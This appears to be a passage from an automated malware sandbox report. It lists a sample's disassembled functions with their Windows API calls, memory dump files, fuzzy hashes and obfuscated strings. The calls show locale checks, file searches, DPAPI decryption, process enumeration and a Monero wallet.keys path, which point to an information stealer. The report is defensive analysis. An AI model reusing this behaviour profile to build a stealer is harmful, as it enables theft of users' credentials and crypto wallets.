                          • Opcode Fuzzy Hash: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                          • Instruction Fuzzy Hash: E19130B2A0020897CB14FB74DC969FD737DEF84340F41C568F95A96185EE74AB098BB2
                          Function 011A3DC1 Relevance: 11.6, Strings: 8, Instructions: 1622COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !s.o$0r\~$5l3Q$F)6$W^<>$t@/-$v^__$5.
                          • API String ID: 0-246233754
                          • Opcode ID: ef2226dae9872f0af3e0768114adeadfa5d38af6547aa0b07ffa4b9b0cea0b6d
                          • Instruction ID: 0244de85151dacd88051190ad7c311dc4077589e18ba077927f32a4b8c5a0a8c
                          • Opcode Fuzzy Hash: ef2226dae9872f0af3e0768114adeadfa5d38af6547aa0b07ffa4b9b0cea0b6d
                          • Instruction Fuzzy Hash: 6AB2E5F3A0C2149FE304AE2DEC8577AFBE5EF94720F16892DE6C4C3744EA3558448696
                          Function 011AF9A9 Relevance: 11.6, Strings: 8, Instructions: 1582COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %{'N$6Vo$M|-$^'Qw$c"W}$g"W}$AOn$WEF
                          • API String ID: 0-2025990060
                          • Opcode ID: f887e53cf8930b29de8265286bf5fc4ad807128b7d15fb3e743cc22fd321ff6a
                          • Instruction ID: ed606837bdea2fbda8547ee2a97734c752745644315937f783625696c46df32e
                          • Opcode Fuzzy Hash: f887e53cf8930b29de8265286bf5fc4ad807128b7d15fb3e743cc22fd321ff6a
                          • Instruction Fuzzy Hash: 2AB2D3F360C2009FE3046E2DEC8567AFBE9EF94720F1A892DE6C4C7744E63598418697
                          Function 00DF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00E005AF), ref: 00DF7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DF7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DF7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DF7C62
                          • LocalFree.KERNEL32(00000000), ref: 00DF7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                          • Instruction ID: 5ff2c62651b2ca0c4b25a15d98b4051dc65737e443f8cb79dc67fbd5bd35ae9b
                          • Opcode Fuzzy Hash: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                          • Instruction Fuzzy Hash: 994107B194021CABDB24DB94DC99BFEB378EB48700F608199E60966181DB746B85CFB1
                          Function 011A229B Relevance: 10.3, Strings: 7, Instructions: 1565COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1v:$&.k$@JV~$ca42$k[=$uKu$|Z;o
                          • API String ID: 0-935616274
                          • Opcode ID: 63ed5de06395ce09c3400114f9685bd65f5e02e71b3d88c88685c93f157bcb0b
                          • Instruction ID: c27a0c3605f634a8e7f09b7b480f84622a7a703d05de1058d4b1af5a1b3a41ce
                          • Opcode Fuzzy Hash: 63ed5de06395ce09c3400114f9685bd65f5e02e71b3d88c88685c93f157bcb0b
                          • Instruction Fuzzy Hash: 5BB2D3F360C2009FE704AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                          Function 00DEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E00D73), ref: 00DEE4A2
                          • StrCmpCA.SHLWAPI(?,00E014F8), ref: 00DEE4F2
                          • StrCmpCA.SHLWAPI(?,00E014FC), ref: 00DEE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                          • Instruction ID: c8a306f545c0627d4858a1e959737d8f06df58c655d5643fabb837b88901136b
                          • Opcode Fuzzy Hash: c9ce18ac407776b0b88ef266df6fed489a8996fb92b6c907bd87355761a7e32c
                          • Instruction Fuzzy Hash: 66123BB190011C9ADB24FB64DC96EFD7338EF54340F4181A9B60EA6095EE746B49CFB2
                          Function 011ADEA3 Relevance: 9.1, Strings: 6, Instructions: 1610COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: E}O$T8X$WS_l$jbW$t}C$wu9!
                          • API String ID: 0-381369359
                          • Opcode ID: e584ebbf0e6746a6f3db450c456a1b11f7c56d3ad1ccb238964cbdf54f1f160b
                          • Instruction ID: 3c76b90d65a908b1b72ec1301b98dcd7e45e864d85735a391a8a8a3908158447
                          • Opcode Fuzzy Hash: e584ebbf0e6746a6f3db450c456a1b11f7c56d3ad1ccb238964cbdf54f1f160b
                          • Instruction Fuzzy Hash: EEB208F3A0C2049FE3046E2DEC8567AFBE9EF94720F16493DEAC4C7744EA3558058696
                          Function 00DEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                          • lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                          • lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                          • lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 678ea2258e4dc3d5d79d8ef6718ac41f7fae9b9fc9382a69a98cc8b0c5674293
                          • Instruction ID: 614d35b695d938dbc69f0a63a1204b22b2698c8fcd8e2a6fc2e67f161ef9cb87
                          • Opcode Fuzzy Hash: 678ea2258e4dc3d5d79d8ef6718ac41f7fae9b9fc9382a69a98cc8b0c5674293
                          • Instruction Fuzzy Hash: EC418674904209DFCB20DF94DD89BFEB7B8FB48304F1041A8E509A7280D7755A85CFA1
                          Function 00DE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DE724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DE7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DE7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DE72A4
                          • LocalFree.KERNEL32(?), ref: 00DE72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                          • Instruction ID: 33bb99ee4e886afd660ec7bde863d216a36ec9f997a22fbe7675c9317f4bfcb4
                          • Opcode Fuzzy Hash: 8ce67f5b61f15a5dc51015d943f0cf7a96cca05d0b01a3d8dfc655d9421ed823
                          • Instruction Fuzzy Hash: 62014075B40208FBDB20DFD4CD46F9E7778AB44700F204055FB05AB2C4CAB5AA008B64
                          Function 00DF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DF961E
                          • Process32First.KERNEL32(00E00ACA,00000128), ref: 00DF9632
                          • Process32Next.KERNEL32(00E00ACA,00000128), ref: 00DF9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00DF965C
                          • CloseHandle.KERNEL32(00E00ACA), ref: 00DF967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                          • Instruction ID: ba0b75fec97ac6564f4284d2e4a8404dc84c3a960c19c98d8e339dd744ba51b4
                          • Opcode Fuzzy Hash: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                          • Instruction Fuzzy Hash: AD010C75A00208EBCB24DFA5D958BEDB7F8FB48300F108198EA46D7240DB759B44CF61
                          Function 011A7339 Relevance: 6.7, Strings: 4, Instructions: 1652COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -1n?$KP\$jc>$p{;
                          • API String ID: 0-916700898
                          • Opcode ID: 76cc81a6f6edf74654f2f853c1f99f0aa51816b2cc193d779a5d2041841dc2e5
                          • Instruction ID: 7020b1aa863a7baa5abcc94552f88cc62b988c2ea873fbb72dcd43be542848b4
                          • Opcode Fuzzy Hash: 76cc81a6f6edf74654f2f853c1f99f0aa51816b2cc193d779a5d2041841dc2e5
                          • Instruction Fuzzy Hash: 7DB216F3A0C204AFE3046E2DEC4567ABBE9EFD4720F1A493DE6C4C3744E67598058696
                          Function 00DF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E005B7), ref: 00DF86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00DF86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00DF86F3
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • CloseHandle.KERNEL32(?), ref: 00DF8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
